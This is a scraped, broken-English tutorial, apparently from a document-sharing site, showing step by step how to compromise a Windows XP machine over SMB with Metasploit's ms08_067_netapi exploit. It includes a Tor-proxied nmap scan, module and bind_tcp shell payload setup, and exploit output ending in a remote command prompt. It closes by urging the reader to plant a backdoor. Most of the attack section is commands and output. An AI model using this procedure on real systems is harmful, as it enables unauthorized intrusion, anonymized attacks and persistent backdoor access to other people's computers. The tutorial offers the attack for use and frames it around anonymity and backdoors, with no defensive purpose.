Sei sulla pagina 1di 4

Exploit windows use

windows/smb/ms08_067_netapi
Author : Abdullah Al Muzammi,.S.Kom
web blog : http://logsabdullah.blogspot.com
Email : muzammi06@gmail.com
bismillah
hi...
today i'am will show to you how used framework exploit. here i would explotation a
system operation windos as target exploit.
oke..
firts i must know ip target. in here i have ip target : 192.168.56.101 and ip address
my computer 192.168.56.1 hembzs... a framework can we used as searching
information system on target. we using nmap to find a info device system on target
for example :
root@portme-net:~# proxychains nmap -sV 192.168.56.101
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-09-01 03:15 WIT
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:80
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:135
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:139
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:445
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:3306
Nmap scan report for 192.168.56.101
Host is up (0.00036s latency).
Not shown: 995 closed ports
PORT
STATE SERVICE
VERSION
80/tcp open http?
135/tcp open msrpc?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds?
3306/tcp open mysql?
MAC Address: 08:00:27:EF:B6:6D (Cadmus Computer Systems)
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds
root@portme-net:~#

i'm use tor as strong anonymity. (Running on Linux i686) in my computer. oke now
we have information target with open port , mac target. next we will msfconsole
=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
msf > search netapi
[*] Searching loaded modules for pattern 'netapi'...
Exploits
========
Name
Disclosure Date Rank Description
------------------ ---- ----------windows/smb/ms03_049_netapi 2003-11-11
good Microsoft Workstation
Service NetAddAlternateComputerName Overflow
windows/smb/ms06_040_netapi 2006-08-08
great Microsoft Server Service
NetpwPathCanonicalize Overflow
windows/smb/ms06_070_wkssvc 2006-11-14
manual Microsoft Workstation
Service NetpManageIPCConnect Overflow
windows/smb/ms08_067_netapi 2008-10-28
great Microsoft Server Service
Relative Path Stack Corruption
above searching netapi we find exploits #windows/smb/ms08_067_netapi# next
type command and seting RHOST
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
while search infomation device we can see with show option :
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name
Current Setting Required Description
------------------ -------- ----------RHOST 192.168.56.101 yes
The target address
RPORT 445
yes
Set the SMB service port
SMBPIPE BROWSER
yes
The pipe name to use (BROWSER, SRVSVC)

Exploit target:
Id Name
-- ---0 Automatic Targeting
oke above we have information exploit RHOST and RPORT using byspass system
windows. so next we will payloads for exploit and this is we use bind_tcp to set
payload exploit. after we do exploit if you want know when located bind tcp, we can
searching with type "searchig bin"
msf exploit(ms08_067_netapi) > search bind
[*] Searching loaded modules for pattern 'bind'...
...................................................................
................................
windows/shell_bind_tcp
..............................................
..............................................
now we can setting payload :
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name
Current Setting Required Description
------------------ -------- ----------RHOST 192.168.56.101 yes
The target address
RPORT 445
yes
Set the SMB service port
SMBPIPE BROWSER
yes
The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):


Name
Current Setting Required Description
------------------ -------- ----------EXITFUNC thread
yes
Exit technique: seh, thread, process, none
LPORT
4444
yes
The listen port
RHOST
192.168.56.101 no
The target address

Exploit target:
Id Name
-- ---0 Automatic Targeting

msf exploit(ms08_067_netapi) > exploit


[*] Started bind handler
[*] Sending stage (240 bytes) to 192.168.56.101
[*] Automatically detecting the target...
[*] Command shell session 1 opened (192.168.56.1:57959 -> 192.168.56.101:4444)
at 2011-09-01 00:54:16 +0700
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows XP SP3 English (NX)
[-] Exploit exception: The SMB server did not reply to our request
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\hakaje\My Documents>
wow....know you can aksses computer target.. so is simple ...
aftter you do command exploit, i hope aplication backdor runing on system target.
you can read my artikel how make and runnning backdor ..
woke.. just enogh "hembzs.. lombok its my home learn.learn...and learn..

Potrebbero piacerti anche